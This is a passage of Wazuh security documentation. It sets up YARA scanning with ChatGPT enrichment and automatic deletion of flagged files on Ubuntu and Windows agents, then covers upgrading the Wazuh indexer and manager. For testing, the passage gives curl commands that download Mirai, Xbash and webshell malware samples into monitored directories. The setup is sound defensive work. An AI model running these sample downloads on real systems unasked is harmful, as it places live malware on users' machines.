                    response_text=$(echo "$chatgpt_response" | jq -r '.choices[0].message.content')
    
                    # Check if the response text is null and handle the error
                    if [[ $response_text == "null" ]]; then
                        echo "wazuh-YARA: ERROR - ChatGPT API returned null response: $chatgpt_response" >> ${LOG_FILE}
                    else
                        # Combine the YARA scan output and ChatGPT response
                        combined_output="wazuh-YARA: INFO - Scan result: $line | chatgpt_response: $response_text"
    
                        # Append the combined output to the log file
                        echo "$combined_output" >> ${LOG_FILE}
                    fi
                fi
            else
                echo "wazuh-YARA: INFO - Scan result: $line" >> ${LOG_FILE}
            fi
        done <<< "$YARA_output"
    
        # If API key was invalid, log a specific message
        if $api_key_invalid; then
            echo "wazuh-YARA: INFO - API key is invalid. ChatGPT response omitted." >> ${LOG_FILE}
        fi
    else
        echo "wazuh-YARA: INFO - No YARA rule matched." >> ${LOG_FILE}
    fi
    
    exit 0;
    

    Note

    If the supplied <API_KEY> is invalid, Wazuh triggers an alert with the value of the chatgpt_response field set to None. Logs about the invalid API key are in the /var/ossec/logs/active-responses.log file.

  6. Change the owner of the yara.sh script to root:wazuh, and the file permissions to 750:

    $ sudo chown root:wazuh /var/ossec/active-response/bin/yara.sh
    $ sudo chmod 750 /var/ossec/active-response/bin/yara.sh
    
  7. Add the following within the <syscheck> block of the Wazuh agent /var/ossec/etc/ossec.conf configuration file to monitor the /home directory:

    <directories realtime="yes">/home</directories>
    
  8. Restart the Wazuh agent to apply the configuration changes:

    $ sudo systemctl restart wazuh-agent
    
Windows 11 endpoint

Perform the following steps to install Python, YARA, and download YARA rules.

  1. Download the Python executable installer from the official Python website.

  2. Run the Python installer once downloaded, and make sure to check the following boxes:

    • Install launcher for all users

    • Add python.exe to PATH. This places the Python interpreter in the execution path.

  3. Download and install the latest Visual C++ Redistributable package.

  4. Open PowerShell with administrator privileges to download and extract YARA:

    > Invoke-WebRequest -Uri https://github.com/VirusTotal/yara/releases/download/v4.5.1/yara-v4.5.1-2298-win64.zip -OutFile yara-v4.5.1-2298-win64.zip
    > Expand-Archive yara-v4.5.1-2298-win64.zip; Remove-Item yara-v4.5.1-2298-win64.zip
    
  5. Create a directory called C:\Program Files (x86)\ossec-agent\active-response\bin\yara\ and copy the YARA executable into it:

    > mkdir 'C:\Program Files (x86)\ossec-agent\active-response\bin\yara\'
    > cp .\yara-v4.5.1-2298-win64\yara64.exe 'C:\Program Files (x86)\ossec-agent\active-response\bin\yara\'
    
  6. Download YARA rules using valhallaAPI. Valhalla is a YARA and Sigma rule repository provided by Nextron Systems:

    > python -m pip install valhallaAPI
    > python -c "from valhallaAPI.valhalla import ValhallaAPI; v = ValhallaAPI(api_key='1111111111111111111111111111111111111111111111111111111111111111'); response = v.get_rules_text(); open('yara_rules.yar', 'w').write(response)"
    > mkdir 'C:\Program Files (x86)\ossec-agent\active-response\bin\yara\rules\'
    > cp yara_rules.yar 'C:\Program Files (x86)\ossec-agent\active-response\bin\yara\rules\'
    

    Note

    If you use a custom YARA rule, ensure that the description field in the YARA rule metadata is present, as this field is required to enrich the alert with ChatGPT.

  7. Create a script yara.py in the C:\Program Files (x86)\ossec-agent\active-response\bin\ directory. This script runs a YARA scan against any file modified or added to the monitored directory. It also queries ChatGPT to enrich the logs and attempts to remove malware files detected by YARA. Replace <API_KEY> with your OpenAI API key and <OPENAI_MODEL> with your preferred OpenAI model. The model used in this POC guide is gpt-4-turbo:

    import os
    import subprocess
    import json
    import re
    import requests
    
    API_KEY = '<API_KEY>'
    OPENAI_MODEL='<OPENAI_MODEL>' #for example gpt-4-turbo
    
    # Determine OS architecture and set log file path
    if os.environ['PROCESSOR_ARCHITECTURE'].endswith('86'):
        log_file_path = os.path.join(os.environ['ProgramFiles'], 'ossec-agent', 'active-response', 'active-responses.log')
    else:
        log_file_path = os.path.join(os.environ['ProgramFiles(x86)'], 'ossec-agent', 'active-response', 'active-responses.log')
    
    def log_message(message):
        with open(log_file_path, 'a') as log_file:
            log_file.write(message + '\n')
    
    def read_input():
        return input()
    
    def get_syscheck_file_path(json_file_path):
        with open(json_file_path, 'r') as json_file:
            data = json.load(json_file)
            return data['parameters']['alert']['syscheck']['path']
    
    def run_yara_scan(yara_exe_path, yara_rules_path, syscheck_file_path):
        try:
            result = subprocess.run([yara_exe_path, '-m', yara_rules_path, syscheck_file_path], capture_output=True, text=True)
            return result.stdout.strip()
        except Exception as e:
            log_message(f"Error running Yara scan: {str(e)}")
            return None
    
    def extract_description(yara_output):
        match = re.search(r'description="([^"]+)"', yara_output)
        if match:
            return match.group(1)
        else:
            return None
    
    def query_chatgpt(description):
        headers = {
            'Authorization': f'Bearer {API_KEY}',
            'Content-Type': 'application/json'
        }
        data = {
            'model': OPENAI_MODEL,
            'messages': [{'role': 'system', 'content': f'In one paragraph, tell me about the impact and how to mitigate {description}'}],
            'temperature': 1,
            'max_tokens': 256,
            'top_p': 1,
            'frequency_penalty': 0,
            'presence_penalty': 0
        }
        response = requests.post('https://api.openai.com/v1/chat/completions', headers=headers, json=data)
        if response.status_code == 200:
            return response.json()['choices'][0]['message']['content']
        elif response.status_code == 401:  # Unauthorized (invalid API key)
            log_message("wazuh-YARA: ERROR - Invalid ChatGPT API key")
            return None
        else:
            log_message(f"Error querying ChatGPT: {response.status_code} {response.text}")
            return None
    
    def main():
        json_file_path = r"C:\Program Files (x86)\ossec-agent\active-response\stdin.txt"
        yara_exe_path = r"C:\Program Files (x86)\ossec-agent\active-response\bin\yara\yara64.exe"
        yara_rules_path = r"C:\Program Files (x86)\ossec-agent\active-response\bin\yara\rules\yara_rules.yar"
    
        input_data = read_input()
    
        with open(json_file_path, 'w') as json_file:
            json_file.write(input_data)
    
        syscheck_file_path = get_syscheck_file_path(json_file_path)
    
        yara_output = run_yara_scan(yara_exe_path, yara_rules_path, syscheck_file_path)
        if yara_output is not None:
            description = extract_description(yara_output)
    
            if description:
                chatgpt_response = query_chatgpt(description)
                if chatgpt_response:
                    combined_output = f"wazuh-YARA: INFO - Scan result: {yara_output} | chatgpt_response: {chatgpt_response}"
                    log_message(combined_output)
                else:
                    # Log the Yara scan result without the ChatGPT response
                    log_message(f"wazuh-YARA: INFO - Scan result: {yara_output} | chatgpt_response: None")
    
                # Delete the scanned file if a description is found
                try:
                    os.remove(syscheck_file_path)
                    if not os.path.exists(syscheck_file_path):
                        log_message(f"wazuh-YARA: INFO - Successfully deleted {syscheck_file_path}")
                    else:
                        log_message(f"wazuh-YARA: INFO - Unable to delete {syscheck_file_path}")
                except Exception as e:
                    log_message(f"Error deleting file: {str(e)}")
            else:
                log_message("Failed to extract description from Yara output.")
        else:
            log_message("Yara scan returned no output.")
    
    if __name__ == "__main__":
        main()
    

    Note

    If the supplied <API_KEY> is invalid, Wazuh triggers an alert with the value of the chatgpt_response field set to None. You can find logs about the invalid API key in the C:\Program Files (x86)\ossec-agent\active-response\active-response.log file.

  8. Run the following command using PowerShell to convert the yara.py script to an executable file:

    > pip install pyinstaller
    > pyinstaller -F "C:\Program Files (x86)\ossec-agent\active-response\bin\yara.py"
    

    This creates a yara.exe executable in the C:\Users\<USER>\dist\ directory.

    Note

    If you run the above commands as Administrator, the executable file will be in the C:\Windows\System32\dist directory.

  9. Copy the yara.exe executable file to C:\Program Files (x86)\ossec-agent\active-response\bin\ directory on the monitored endpoint.

  10. Add the following within the <syscheck> block of the Wazuh agent C:\Program Files (x86)\ossec-agent\ossec.conf configuration file to monitor the Users directory:

    <directories realtime="yes">C:\Users\*\Downloads</directories>
    
  11. Restart the Wazuh agent to apply the configuration changes:

    > Restart-Service -Name wazuh
    
Wazuh server

Perform the following steps on the Wazuh server to configure custom rules, decoders, and the Active Response module.

  1. Add the following decoders to the Wazuh server /var/ossec/etc/decoders/local_decoder.xml file to parse the data in YARA scan results:

    <!--
      YARA Decoder
    -->
    
    <decoder name="YARA_decoder">
      <prematch>wazuh-YARA:</prematch>
    </decoder>
    
    <decoder name="YARA_child">
      <parent>YARA_decoder</parent>
      <regex type="pcre2">wazuh-YARA: (\S+)</regex>
      <order>YARA.log_type</order>
    </decoder>
    
    <decoder name="YARA_child">
      <parent>YARA_decoder</parent>
      <regex type="pcre2">Scan result: (\S+)\s+</regex>
      <order>YARA.rule_name</order>
    </decoder>
    
    <decoder name="YARA_child">
      <parent>YARA_decoder</parent>
      <regex type="pcre2">\[description="([^"]+)",</regex>
      <order>YARA.rule_description</order>
    </decoder>
    
    <decoder name="YARA_child">
      <parent>YARA_decoder</parent>
      <regex type="pcre2">author="([^"]+)",</regex>
      <order>YARA.rule_author</order>
    </decoder>
    
    <decoder name="YARA_child">
      <parent>YARA_decoder</parent>
      <regex type="pcre2">reference="([^"]+)",</regex>
      <order>YARA.reference</order>
    </decoder>
    
    <decoder name="YARA_child">
      <parent>YARA_decoder</parent>
      <regex type="pcre2">date="([^"]+)",</regex>
      <order>YARA.published_date</order>
    </decoder>
    
    <decoder name="YARA_child">
      <parent>YARA_decoder</parent>
      <regex type="pcre2">score =(\d+),</regex>
      <order>YARA.threat_score</order>
    </decoder>
    
    <decoder name="YARA_child">
      <parent>YARA_decoder</parent>
      <regex type="pcre2">customer="([^"]+)",</regex>
      <order>YARA.api_customer</order>
    </decoder>
    
    <decoder name="YARA_child">
      <parent>YARA_decoder</parent>
      <regex type="pcre2">hash1="([^"]+)",</regex>
      <order>YARA.file_hash</order>
    </decoder>
    
    <decoder name="YARA_child">
      <parent>YARA_decoder</parent>
      <regex type="pcre2">tags="([^"]+)",</regex>
      <order>YARA.tags</order>
    </decoder>
    
    <decoder name="YARA_child">
      <parent>YARA_decoder</parent>
      <regex type="pcre2">minimum_YARA="([^"]+)"\]</regex>
      <order>YARA.minimum_YARA_version</order>
    </decoder>
    
    <decoder name="YARA_child">
      <parent>YARA_decoder</parent>
      <regex type="pcre2">\] (.*) \|</regex>
      <order>YARA.scanned_file</order>
    </decoder>
    
    <decoder name="YARA_child">
      <parent>YARA_decoder</parent>
      <regex type="pcre2">chatgpt_response: (.*)</regex>
      <order>YARA.chatgpt_response</order>
    </decoder>
    
    <decoder name="YARA_child">
      <parent>YARA_decoder</parent>
      <regex type="pcre2">Successfully deleted (.*)</regex>
      <order>YARA.file_deleted</order>
    </decoder>
    
    <decoder name="YARA_child">
      <parent>YARA_decoder</parent>
      <regex type="pcre2">Unable to delete (.*)</regex>
      <order>YARA.file_not_deleted</order>
    </decoder>
    
  2. Add the following rules to the /var/ossec/etc/rules/local_rules.xml file. The rules detect FIM events in the monitored directory. This triggers the YARA Active response script to delete a file if identified as a malicious file.

    <group name="syscheck,">
      <rule id="100300" level="5">
        <if_sid>550</if_sid>
        <field name="file">/home</field>
        <description>File modified in /home directory.</description>
      </rule>
    
      <rule id="100301" level="5">
        <if_sid>554</if_sid>
        <field name="file">/home</field>
        <description>File added to /home directory.</description>
      </rule>
      <rule id="100302" level="5">
        <if_sid>550</if_sid>
        <field name="file" type="pcre2">(?i)C:\\Users.+Downloads</field>
        <description>File modified in the downloads directory.</description>
      </rule>
    
      <rule id="100303" level="5">
        <if_sid>554</if_sid>
        <field name="file" type="pcre2">(?i)C:\\Users.+Downloads</field>
        <description>File added to the downloads directory.</description>
      </rule>
    </group>
    
    <group name="yara,">
      <rule id="108000" level="0">
        <decoded_as>YARA_decoder</decoded_as>
        <description>YARA grouping rule</description>
      </rule>
      <rule id="108001" level="10">
        <if_sid>108000</if_sid>
        <match>wazuh-YARA: INFO - Scan result: </match>
        <description>File "$(YARA.scanned_file)" is a positive match for YARA rule: $(YARA.rule_name)</description>
      </rule>
    
      <rule id="108002" level="5">
        <if_sid>108000</if_sid>
        <field name="yara.file_deleted">\.</field>
        <description>Active response successfully removed malicious file "$(YARA.file_deleted)"</description>
      </rule>
    
      <rule id="108003" level="12">
        <if_sid>108000</if_sid>
        <field name="YARA.file_not_deleted">\.</field>
        <description>Active response unable to delete malicious file "$(YARA.file_not_deleted)"</description>
      </rule>
    </group>
    
  3. Add the following configuration to the Wazuh server /var/ossec/etc/ossec.conf configuration file. This configures the Active Response module to trigger after the rules with ID 100300, 100301, 100302, and 100303 are fired:

    <ossec_config>
      <command>
        <name>yara_windows</name>
        <executable>yara.exe</executable>
        <timeout_allowed>no</timeout_allowed>
      </command>
    
      <command>
        <name>yara_linux</name>
        <executable>yara.sh</executable>
        <extra_args>-yara_path /usr/local/bin -yara_rules /var/ossec/active-response/yara/rules/yara_rules.yar</extra_args>
        <timeout_allowed>no</timeout_allowed>
      </command>
    
      <active-response>
        <disabled>no</disabled>
        <command>yara_linux</command>
        <location>local</location>
        <rules_id>100300,100301</rules_id>
      </active-response>
    
      <active-response>
        <disabled>no</disabled>
        <command>yara_windows</command>
        <location>local</location>
        <rules_id>100302,100303</rules_id>
      </active-response>
    </ossec_config>
    
  4. Restart the Wazuh manager to apply the configuration changes:

    $ sudo systemctl restart wazuh-manager
    
Testing the configuration
Ubuntu 22.04 endpoint

Run the following commands on the Ubuntu endpoint to download malware samples to the monitored /home directory:

# curl "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/5.0/resources/samples/mirai" > /home/mirai
# curl "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/5.0/resources/samples/xbash" > /home/xbash
# curl "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/5.0/resources/samples/webshell" > /home/webshell

You can visualize the alert data in the Wazuh dashboard. To do this, go to the Modules > Security events tab and add the rule.groups:yara filter in the search bar to query the alerts.

As seen in the image, ChatGPT provides more context to the malicious file detected by YARA. Further insight such as origin, attack vectors, and impact of the malicious file can be seen in the yara.chatgpt_response field.

ChatGPT context in alert with YARA
Active Response

The below image shows an example of an alert triggered when the provided ChatGPT API key is invalid or a matched YARA rule does not contain a description.

ChatGPT context none in alert with YARA
Windows 11 endpoint

Run the following commands via PowerShell to download malware samples to the monitored C:\Users\*\Downloads directory:

> curl "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/5.0/resources/samples/mirai" -o   $env:USERPROFILE\Downloads\mirai
> curl "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/5.0/resources/samples/xbash" -o   $env:USERPROFILE\Downloads\xbash
> curl "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/5.0/resources/samples/webshell" -o $env:USERPROFILE\Downloads\webshell

You can visualize the alert data in the Wazuh dashboard. To do this, go to the Security events module and add the filter in the search bar to query the alerts.

  • rule.groups:yara

As seen in the image, ChatGPT provides more context to the malicious file detected by YARA. Further insight, such as origin, attack vectors, and impact of the malicious file, can be seen in the yara.chatgpt_response field.

ChatGPT context in alert with YARA
Active Response

The below image shows an example of an alert triggered when the provided ChatGPT API key is invalid or a matched YARA rule does not contain a description.

ChatGPT context none in alert with YARA

Upgrade guide

This guide includes instructions on how to upgrade the Wazuh central components (server, indexer, and dashboard) and the Wazuh agent.

Wazuh components compatibility

All central Wazuh components must have identical version numbers, including the patch level, for proper operation. Additionally, the Wazuh manager must always be the same version or newer than the Wazuh agents.

Note that Wazuh indexer 5.0.0 is specifically compatible with Filebeat-OSS 7.10.2.

Upgrade the Wazuh central components

The Wazuh central components section includes instructions on how to upgrade the Wazuh server, the Wazuh indexer, and the Wazuh dashboard. These instructions apply to both all-in-one deployments and multi-node cluster deployments.

Upgrade the Wazuh agents

You can upgrade the Wazuh agents either remotely or locally. For remote upgrades, you can use either the Wazuh manager (agent_upgrade tool ) or the Wazuh API (via the Wazuh dashboard or a command-line tool). For details, refer to the remote agent upgrade section.

To perform the upgrade locally, select your operating system and follow the instructions.

Wazuh central components

This section guides you through the upgrade process of the Wazuh indexer, the Wazuh server, and the Wazuh dashboard.

  • All-in-one deployments: Execute all commands and configuration actions on the same node since all components run on a single system.

  • Multi-node cluster deployments: Run commands and apply configurations on the respective node where the component being upgraded is located.

Warning

Downgrading to version 4.11 and earlier is not possible. Since version 4.12.0, Wazuh uses a newer version of Apache Lucene.

Apache Lucene does not support downgrades, meaning once you upgrade to Wazuh 4.12.0 or later, you cannot roll back to 4.11 and earlier versions without a fresh installation of the indexer.

To avoid data loss, create an index snapshot before upgrading. For more details, refer to the Opensearch documentation.

Note

Since Wazuh 5.0, the following Rootcheck configuration options and database files have been removed:

  • File check options: <check_files>, <rootkit_files>, and the database file rootkit_files.txt.

  • Trojan scan options: <check_trojans>, <rootkit_trojans>, and the database file rootkit_trojans.txt.

  • Policy check options: <check_unixaudit>, <check_winaudit>, <check_winapps>, <check_winmalware>, and the database files system_audit_rcl.txt, system_audit_ssh.txt, win_applications_rcl.txt, win_audit_rcl.txt, and win_malware_rcl.txt.

These functionalities overlap with, or are replaced by, the Security Configuration Assessment (SCA) and File Integrity Monitoring (FIM) capabilities. If any of these options are configured in your ossec.conf file, remove them before upgrading to avoid configuration parsing warnings.

Preparing the upgrade

Perform the steps below before upgrading any of the Wazuh components. In case Wazuh is installed in a multi-node cluster configuration, repeat the following steps for every node.

  1. Ensure you have added the Wazuh repository to every Wazuh indexer, server, and dashboard node before proceeding to perform the upgrade actions.

    1. Import the GPG key.

      # rpm --import https://packages.wazuh.com/key/GPG-KEY-WAZUH
      
    2. Add the repository.

      • For RHEL-compatible systems version 8 and earlier, use the following command:

        # echo -e '[wazuh]\ngpgcheck=1\ngpgkey=https://packages.wazuh.com/key/GPG-KEY-WAZUH\nenabled=1\nname=EL-$releasever - Wazuh\nbaseurl=https://packages.wazuh.com/5.x/yum/\nprotect=1' | tee /etc/yum.repos.d/wazuh.repo
        
      • For RHEL-compatible systems version 9 and later, use the following command:

        # echo -e '[wazuh]\ngpgcheck=1\ngpgkey=https://packages.wazuh.com/key/GPG-KEY-WAZUH\nenabled=1\nname=EL-$releasever - Wazuh\nbaseurl=https://packages.wazuh.com/5.x/yum/\npriority=1' | tee /etc/yum.repos.d/wazuh.repo
        
  2. (Recommended) Export customizations from the Wazuh dashboard. This step helps to preserve visualizations, dashboards, and other saved objects in case there are any issues during the upgrade process.

    1. Navigate to Dashboard management > Dashboards Management > Saved objects on the Wazuh dashboard.

    2. Select which objects to export and click Export, or click Export all objects to export everything.

    _images/saved-objects-export.png
  3. Stop the Filebeat and Wazuh dashboard services if installed in the node:

    # systemctl stop filebeat
    # systemctl stop wazuh-dashboard
    
Upgrading the Wazuh indexer

The Wazuh indexer cluster remains operational throughout the upgrade. The rolling upgrade process allows nodes to be updated one at a time, ensuring continuous service availability and minimizing disruptions. The steps detailed in the following sections apply to both single-node and multi-node Wazuh indexer clusters.

Preparing the Wazuh indexer cluster for upgrade

Perform the following steps on any of the Wazuh indexer nodes replacing <WAZUH_INDEXER_IP_ADDRESS>, <USERNAME>, and <PASSWORD>.

  1. Backup the existing Wazuh indexer security configuration files:

    # /usr/share/wazuh-indexer/bin/indexer-security-init.sh --options "-backup /etc/wazuh-indexer/opensearch-security -icl -nhnv"
    
    Security Admin v7
    Will connect to 127.0.0.1:9200 ... done
    Connected as "CN=admin,OU=Wazuh,O=Wazuh,L=California,C=US"
    OpenSearch Version: 2.19.2
    Contacting opensearch cluster 'opensearch' and wait for YELLOW clusterstate ...
    Clustername: wazuh-cluster
    Clusterstate: GREEN
    Number of nodes: 1
    Number of data nodes: 1
    .opendistro_security index already exists, so we do not need to create one.
    Will retrieve '/config' into /etc/wazuh-indexer/opensearch-security/config.yml
       SUCC: Configuration for 'config' stored in /etc/wazuh-indexer/opensearch-security/config.yml
    Will retrieve '/roles' into /etc/wazuh-indexer/opensearch-security/roles.yml
       SUCC: Configuration for 'roles' stored in /etc/wazuh-indexer/opensearch-security/roles.yml
    Will retrieve '/rolesmapping' into /etc/wazuh-indexer/opensearch-security/roles_mapping.yml
       SUCC: Configuration for 'rolesmapping' stored in /etc/wazuh-indexer/opensearch-security/roles_mapping.yml
    Will retrieve '/internalusers' into /etc/wazuh-indexer/opensearch-security/internal_users.yml
       SUCC: Configuration for 'internalusers' stored in /etc/wazuh-indexer/opensearch-security/internal_users.yml
    Will retrieve '/actiongroups' into /etc/wazuh-indexer/opensearch-security/action_groups.yml
       SUCC: Configuration for 'actiongroups' stored in /etc/wazuh-indexer/opensearch-security/action_groups.yml
    Will retrieve '/tenants' into /etc/wazuh-indexer/opensearch-security/tenants.yml
       SUCC: Configuration for 'tenants' stored in /etc/wazuh-indexer/opensearch-security/tenants.yml
    Will retrieve '/nodesdn' into /etc/wazuh-indexer/opensearch-security/nodes_dn.yml
       SUCC: Configuration for 'nodesdn' stored in /etc/wazuh-indexer/opensearch-security/nodes_dn.yml
    Will retrieve '/whitelist' into /etc/wazuh-indexer/opensearch-security/whitelist.yml
       SUCC: Configuration for 'whitelist' stored in /etc/wazuh-indexer/opensearch-security/whitelist.yml
    Will retrieve '/allowlist' into /etc/wazuh-indexer/opensearch-security/allowlist.yml
       SUCC: Configuration for 'allowlist' stored in /etc/wazuh-indexer/opensearch-security/allowlist.yml
    Will retrieve '/audit' into /etc/wazuh-indexer/opensearch-security/audit.yml
       SUCC: Configuration for 'audit' stored in /etc/wazuh-indexer/opensearch-security/audit.yml
    
  2. Disable shard replication to prevent shard replicas from being created while Wazuh indexer nodes are being taken offline for the upgrade.

    curl -X PUT "https://<WAZUH_INDEXER_IP_ADDRESS>:9200/_cluster/settings"  -u <USERNAME> -k -H 'Content-Type: application/json' -d'
    {
      "persistent": {
        "cluster.routing.allocation.enable": "primaries"
      }
    }
    '
    
    {
      "acknowledged" : true,
      "persistent" : {
        "cluster" : {
          "routing" : {
            "allocation" : {
              "enable" : "primaries"
            }
          }
        }
      },
      "transient" : {}
    }
    
  3. Perform a flush operation on the cluster to commit transaction log entries to the index.

    # curl -X POST "https://<WAZUH_INDEXER_IP_ADDRESS>:9200/_flush" -u <USERNAME> -k
    
    {
       "_shards" : {
          "total" : 19,
          "successful" : 19,
          "failed" : 0
       }
    }
    
  4. Run the following command on the Wazuh manager node(s) if running a single-node Wazuh indexer cluster.

    # systemctl stop wazuh-manager
    
Upgrading the Wazuh indexer nodes

Perform the following steps on each Wazuh indexer node to upgrade them. Upgrade nodes with the cluster_manager role last to maintain cluster connectivity among online nodes.

Note

You can check the role of Wazuh indexer nodes in the cluster using the following command:

# curl -k -u <USERNAME> https://<WAZUH_INDEXER_IP_ADDRESS>:9200/_cat/nodes?v
  1. Stop the Wazuh indexer service.

    # systemctl stop wazuh-indexer
    
  2. Backup the /etc/wazuh-indexer/jvm.options file to preserve your custom JVM settings. Create a copy of the file using the following command:

    # cp /etc/wazuh-indexer/jvm.options /etc/wazuh-indexer/jvm.options.old
    
  3. Upgrade the Wazuh indexer to the latest version.

    # yum upgrade wazuh-indexer
    
  4. Manually reapply any custom settings to the /etc/wazuh-indexer/jvm.options file from your backup file.

  5. Restart the Wazuh indexer service.

    # systemctl daemon-reload
    # systemctl enable wazuh-indexer
    # systemctl start wazuh-indexer
    

Repeat steps 1 to 5 above on all Wazuh indexer nodes before proceeding to the post-upgrade actions.

Post-upgrade actions

Perform the following steps on any of the Wazuh indexer nodes replacing <WAZUH_INDEXER_IP_ADDRESS>, <USERNAME>, and <PASSWORD>.

  1. Run the indexer-security-init.sh script to apply the security configuration files from backup into the new Wazuh indexer:

    # /usr/share/wazuh-indexer/bin/indexer-security-init.sh
    
    Security Admin v7
    Will connect to 127.0.0.1:9200 ... done
    Connected as "CN=admin,OU=Wazuh,O=Wazuh,L=California,C=US"
    OpenSearch Version: 2.19.3
    Contacting opensearch cluster 'opensearch' and wait for YELLOW clusterstate ...
    Clustername: wazuh-cluster
    Clusterstate: GREEN
    Number of nodes: 1
    Number of data nodes: 1
    .opendistro_security index already exists, so we do not need to create one.
    Populate config from /etc/wazuh-indexer/opensearch-security/
    Will update '/config' with /etc/wazuh-indexer/opensearch-security/config.yml
       SUCC: Configuration for 'config' created or updated
    Will update '/roles' with /etc/wazuh-indexer/opensearch-security/roles.yml
       SUCC: Configuration for 'roles' created or updated
    Will update '/rolesmapping' with /etc/wazuh-indexer/opensearch-security/roles_mapping.yml
       SUCC: Configuration for 'rolesmapping' created or updated
    Will update '/internalusers' with /etc/wazuh-indexer/opensearch-security/internal_users.yml
       SUCC: Configuration for 'internalusers' created or updated
    Will update '/actiongroups' with /etc/wazuh-indexer/opensearch-security/action_groups.yml
       SUCC: Configuration for 'actiongroups' created or updated
    Will update '/tenants' with /etc/wazuh-indexer/opensearch-security/tenants.yml
       SUCC: Configuration for 'tenants' created or updated
    Will update '/nodesdn' with /etc/wazuh-indexer/opensearch-security/nodes_dn.yml
       SUCC: Configuration for 'nodesdn' created or updated
    Will update '/whitelist' with /etc/wazuh-indexer/opensearch-security/whitelist.yml
       SUCC: Configuration for 'whitelist' created or updated
    Will update '/audit' with /etc/wazuh-indexer/opensearch-security/audit.yml
       SUCC: Configuration for 'audit' created or updated
    Will update '/allowlist' with /etc/wazuh-indexer/opensearch-security/allowlist.yml
       SUCC: Configuration for 'allowlist' created or updated
    SUCC: Expected 10 config types for node {"updated_config_types":["allowlist","tenants","rolesmapping","nodesdn","audit","roles","whitelist","actiongroups","config","internalusers"],"updated_config_size":10,"message":null} is 10 (["allowlist","tenants","rolesmapping","nodesdn","audit","roles","whitelist","actiongroups","config","internalusers"]) due to: null
    Done with success
    
  2. Check that the newly upgraded Wazuh indexer nodes are in the cluster.

    # curl -k -u <USERNAME> https://<WAZUH_INDEXER_IP_ADDRESS>:9200/_cat/nodes?v
    
  3. Re-enable shard allocation.

    curl -X PUT "https://<WAZUH_INDEXER_IP_ADDRESS>:9200/_cluster/settings" -u <USERNAME> -k -H 'Content-Type: application/json' -d'
    {
      "persistent": {
        "cluster.routing.allocation.enable": "all"
      }
    }
    '
    
    {
      "acknowledged" : true,
      "persistent" : {
        "cluster" : {
          "routing" : {
            "allocation" : {
              "enable" : "all"
            }
          }
        }
      },
      "transient" : {}
    }
    
  4. Check the status of the Wazuh indexer cluster again to see if the shard allocation has finished.

    # curl -k -u <USERNAME> https://<WAZUH_INDEXER_IP_ADDRESS>:9200/_cat/nodes?v
    
    ip         heap.percent ram.percent cpu load_1m load_5m load_15m node.role node.roles                                        cluster_manager name
    172.18.0.3           34          86  32    6.67    5.30     2.53 dimr      cluster_manager,data,ingest,remote_cluster_client -               wazuh2.indexer
    172.18.0.4           21          86  32    6.67    5.30     2.53 dimr      cluster_manager,data,ingest,remote_cluster_client *               wazuh1.indexer
    172.18.0.2           16          86  32    6.67    5.30     2.53 dimr      cluster_manager,data,ingest,remote_cluster_client -               wazuh3.indexer
    

Note

Note that the upgrade process doesn't update plugins installed manually. Outdated plugins might cause the upgrade to fail.

  1. Run the following command on each Wazuh indexer node to list installed plugins and identify those that require an update:

    # /usr/share/wazuh-indexer/bin/opensearch-plugin list
    

    In the output, plugins that require an update will be labeled as "outdated".

  2. Remove the outdated plugins and reinstall the latest version replacing <PLUGIN_NAME> with the name of the plugin:

    # /usr/share/wazuh-indexer/bin/opensearch-plugin remove <PLUGIN_NAME>
    # /usr/share/wazuh-indexer/bin/opensearch-plugin install <PLUGIN_NAME>
    
Upgrading the Wazuh server

When upgrading a multi-node Wazuh manager cluster, run the upgrade in every node. Start with the master node to reduce server downtime. To successfully upgrade the Wazuh server, follow these steps in order:

  1. Upgrade the Wazuh manager.

  2. Configure the vulnerability detection. (if required based on the version you are upgrading from).

  3. Configure Filebeat.

Note

Upgrading from Wazuh 4.2.x or lower creates the wazuh operating system user and group to replace ossec. To avoid upgrade conflicts, make sure that the wazuh user and group are not present in your operating system.

Upgrading the Wazuh manager
  1. Upgrade the Wazuh manager to the latest version:

    # yum upgrade wazuh-manager
    

    Warning

    If the /var/ossec/etc/ossec.conf configuration file was modified, it will not be replaced by the upgrade. You will therefore have to add the settings of the new capabilities manually. More information can be found in the User manual.

  2. Run the following command on the Wazuh manager node(s) to start the Wazuh manager service if you stopped it earlier:

    # systemctl daemon-reload
    # systemctl enable wazuh-manager
    # systemctl start wazuh-manager
    
Configuring CDB lists

When upgrading from Wazuh 4.12.x or earlier, follow these steps to configure the newly added CDB lists.

  1. Edit the /var/ossec/etc/ossec.conf file and update the <ruleset> block with the CDB lists highlighted below.

    <ruleset>
        <!-- Default ruleset -->
        <decoder_dir>ruleset/decoders</decoder_dir>
        <rule_dir>ruleset/rules</rule_dir>
        <rule_exclude>0215-policy_rules.xml</rule_exclude>
        <list>etc/lists/audit-keys</list>
        <list>etc/lists/amazon/aws-eventnames</list>
        <list>etc/lists/security-eventchannel</list>
        <list>etc/lists/malicious-ioc/malware-hashes</list>
        <list>etc/lists/malicious-ioc/malicious-ip</list>
        <list>etc/lists/malicious-ioc/malicious-domains</list>
        <!-- User-defined ruleset -->
        <decoder_dir>etc/decoders</decoder_dir>
        <rule_dir>etc/rules</rule_dir>
    </ruleset>
    
  2. Restart the Wazuh manager to apply the configuration changes

    # systemctl restart wazuh-manager
    
Configuring the vulnerability detection and indexer connector

The Wazuh Inventory Harvester and Vulnerability Detection modules rely on the indexer connector setting to forward system inventory data and detected vulnerabilities to the Wazuh indexer.

If upgrading from version 4.8.x or later, skip the vulnerability detection and indexer connector configurations and proceed to Configuring Filebeat. No action is needed as the vulnerability detection and indexer connector blocks are already configured.

When upgrading from Wazuh version 4.7.x or earlier, follow these steps to configure the vulnerability detection and indexer connector blocks.

  1. Update the configuration file

    Edit the /var/ossec/etc/ossec.conf file to include the new <vulnerability-detection> block. Remove the old <vulnerability-detector> block if it exists.

    The updated configuration enables the Wazuh Vulnerability Detection module to index vulnerabilities and alerts, with the vulnerability feed refreshing every 60 minutes. Add the following block to the configuration file:

    <vulnerability-detection>
       <enabled>yes</enabled>
       <index-status>yes</index-status>
       <feed-update-interval>60m</feed-update-interval>
    </vulnerability-detection>
    
  2. Configure the indexer block

